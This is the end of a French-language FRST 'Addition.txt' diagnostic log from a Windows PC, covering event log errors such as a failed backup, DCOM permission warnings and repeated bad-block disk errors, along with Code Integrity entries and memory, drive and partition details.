Description: Échec de la sauvegarde. Erreur : "C:\Users\Zahra\AppData\Roaming\Mozilla\Firefox\Profiles\ghbzcbug.default\cookies.sqlite.bak" Erreur de données (contrôle de redondance cyclique). (0x80070017).

Error: (12/10/2017 07:00:36 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocole LLDP (Link Layer Discovery Protocol) Microsoft.

System Error:
Accès refusé.
.

Error: (12/10/2017 07:00:23 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 513) (User: )
Description: Les services de chiffrement ont échoué lors du traitement de l’appel OnIdentity() dans l’objet System Writer.

Details:
AddLegacyDriverFiles: Unable to back up image of binary Protocole LLDP (Link Layer Discovery Protocol) Microsoft.

System Error:
Accès refusé.
.


Erreurs système:
=============
Error: (12/12/2017 03:07:08 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
et l’APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
au SID AUTORITE NT\SERVICE LOCAL de l’utilisateur (S-1-5-19) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.

Error: (12/12/2017 03:07:08 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT)
Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{6B3B8D23-FA8D-40B9-8DBD-B950333E2C52}
et l’APPID
{4839DDB7-58C2-48F5-8283-E1D1807D0D7D}
au SID AUTORITE NT\SERVICE LOCAL de l’utilisateur (S-1-5-19) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.

Error: (12/12/2017 02:42:06 PM) (Source: Disk) (EventID: 7) (User: )
Description: Le périphérique \Device\Harddisk0\DR0 comporte un bloc défectueux.

Error: (12/12/2017 02:42:04 PM) (Source: Disk) (EventID: 7) (User: )
Description: Le périphérique \Device\Harddisk0\DR0 comporte un bloc défectueux.

Error: (12/12/2017 02:42:02 PM) (Source: Disk) (EventID: 7) (User: )
Description: Le périphérique \Device\Harddisk0\DR0 comporte un bloc défectueux.

Error: (12/12/2017 02:41:50 PM) (Source: Disk) (EventID: 7) (User: )
Description: Le périphérique \Device\Harddisk0\DR0 comporte un bloc défectueux.

Error: (12/12/2017 02:41:48 PM) (Source: Disk) (EventID: 7) (User: )
Description: Le périphérique \Device\Harddisk0\DR0 comporte un bloc défectueux.

Error: (12/12/2017 02:41:45 PM) (Source: Disk) (EventID: 7) (User: )
Description: Le périphérique \Device\Harddisk0\DR0 comporte un bloc défectueux.

Error: (12/12/2017 02:39:01 PM) (Source: Disk) (EventID: 7) (User: )
Description: Le périphérique \Device\Harddisk0\DR0 comporte un bloc défectueux.

Error: (12/12/2017 02:38:59 PM) (Source: Disk) (EventID: 7) (User: )
Description: Le périphérique \Device\Harddisk0\DR0 comporte un bloc défectueux.


CodeIntegrity:
===================================
Date: 2017-08-08 11:47:39.323
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-08-06 13:48:34.582
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-08-05 16:05:10.105
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-08-03 18:24:02.549
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-08-01 17:35:13.561
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-07-28 16:35:09.603
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-07-25 15:37:12.258
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-07-24 13:26:04.988
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.

Date: 2017-07-17 13:09:55.929
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume2\Program Files\Common Files\microsoft shared\OFFICE12\MSOXMLMF.DLL that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Infos Mémoire ===========================

Processeur: Intel(R) Core(TM) i3 CPU M 380 @ 2.53GHz
Pourcentage de mémoire utilisée: 32%
Mémoire physique - RAM - totale: 2997.85 MB
Mémoire physique - RAM - disponible: 2020.59 MB
Mémoire virtuelle totale: 6069.85 MB
Mémoire virtuelle disponible: 5047.78 MB

==================== Lecteurs ================================

Drive c: () (Fixed) (Total:97.56 GB) (Free:19.48 GB) NTFS
Drive d: () (Fixed) (Total:175.78 GB) (Free:87.21 GB) NTFS
Drive e: () (Fixed) (Total:192.32 GB) (Free:75.41 GB) NTFS
Drive g: (DANS_LES_BOIS_CD) (CDROM) (Total:0.48 GB) (Free:0 GB) CDFS
Drive h: (DANS_LES_BOIS_CD) (CDROM) (Total:0.5 GB) (Free:0 GB) CDFS

==================== MBR & Table des partitions ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 73256BD4)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=97.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=175.8 GB) - (Type=07 NTFS)
Partition 4: (Not Active) - (Size=192.3 GB) - (Type=07 NTFS)

==================== Fin de Addition.txt ============================

Publicité


Signaler le contenu de ce document

Publicité